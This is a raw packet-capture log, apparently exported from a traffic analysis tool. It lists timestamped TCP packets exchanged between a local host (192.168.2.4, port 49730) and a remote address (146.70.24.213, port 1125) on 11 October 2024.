                                                                                                                Oct 11, 2024 16:53:47.604581118 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.604593039 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.604612112 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.604628086 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.604629993 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.604643106 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.604669094 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.604670048 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.604712963 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.604722023 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.604793072 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.604834080 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.604851961 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.604890108 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.604902983 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.604931116 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.604983091 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.604998112 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605011940 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605022907 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605026960 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605045080 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605062962 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605077982 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605092049 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605104923 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605104923 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605120897 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605128050 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605135918 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605159044 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605159998 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605175018 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605189085 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605202913 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605206966 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605216980 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605232000 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605258942 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605276108 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605290890 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605304956 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605345011 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605462074 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605475903 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605490923 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605503082 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605506897 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605518103 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605530024 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605535030 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605549097 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605556965 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605565071 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605591059 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605601072 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605604887 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605627060 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605633020 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605643034 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605655909 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605664968 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605669975 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605695963 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605710030 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605724096 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605746031 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605748892 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605761051 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605776072 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605789900 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605799913 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605814934 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605822086 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605834007 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605849028 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605863094 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605866909 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605876923 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605890989 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605894089 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605906963 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.605926037 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605957031 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.605988979 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606003046 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606046915 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.606089115 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606103897 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606117964 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606142044 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.606209040 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606223106 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606236935 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606249094 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.606251955 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606268883 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606271029 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.606292963 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606307030 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606312990 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.606321096 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606336117 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606347084 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.606349945 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606367111 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606374979 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.606404066 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.606589079 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606604099 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606616974 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606631041 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606645107 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606646061 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.606658936 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.606669903 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.606702089 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.690499067 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690527916 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690542936 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690618038 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690632105 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690646887 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690660000 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690682888 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690697908 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.690704107 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690718889 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690733910 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690747976 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690757990 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.690774918 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.690792084 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.690797091 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690812111 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690854073 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.690882921 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690918922 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690932989 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690957069 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.690959930 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.690999031 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.691045046 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.691174984 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.691195965 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.691224098 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.691252947 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.691267014 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.691282034 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.691296101 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.691323996 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.691359043 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.691373110 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.691399097 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.691415071 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.691415071 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.691462040 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.694716930 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.694761992 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.694776058 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.694803953 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.694937944 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.694967985 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.694983006 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.694996119 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.694998026 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.695012093 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695022106 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.695025921 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695043087 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695053101 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.695056915 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695071936 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695080042 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.695085049 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695101023 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695108891 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.695113897 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695122004 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695128918 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695137024 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695193052 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.695957899 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695971966 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.695986986 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696022034 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696053982 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696068048 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696080923 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696094990 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696099043 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696110964 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696124077 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696125984 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696152925 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696156025 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696203947 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696274996 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696290970 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696305990 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696320057 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696329117 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696333885 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696348906 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696367979 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696369886 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696386099 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696391106 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696405888 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696419001 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696433067 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696439028 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696448088 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696463108 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696465969 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696476936 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696491003 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696494102 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696506023 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696520090 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696532011 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696542978 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696542978 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696559906 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696573019 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696583033 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696587086 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696602106 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696610928 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696615934 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696630001 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696643114 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696645021 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696660042 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696681976 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696690083 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696696997 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696710110 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696712017 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696724892 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696738005 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696739912 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696752071 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696767092 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696768045 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696789980 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696789980 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696806908 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696820974 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696829081 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696835041 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696855068 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.696860075 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.696892977 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.697046041 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697060108 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697074890 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697096109 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.697099924 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697114944 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697129011 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697143078 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697149992 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.697158098 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697173119 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697175026 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.697185040 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697201014 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697202921 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.697213888 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697226048 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.697227001 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697241068 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.697256088 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.697290897 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.781414986 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781440020 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781450033 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781455040 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781461954 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781467915 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781476974 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781487942 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781501055 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781511068 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781521082 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781543016 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.781547070 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781558990 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781570911 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781575918 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.781580925 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781594992 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.781611919 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.781799078 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781810045 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781821012 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781841040 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.781861067 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.781936884 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781946898 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781956911 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781965971 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781975985 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781985044 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.781984091 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.781996965 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.782021046 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.782043934 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.782058954 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.782080889 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.782088995 CEST112549730146.70.24.213192.168.2.4
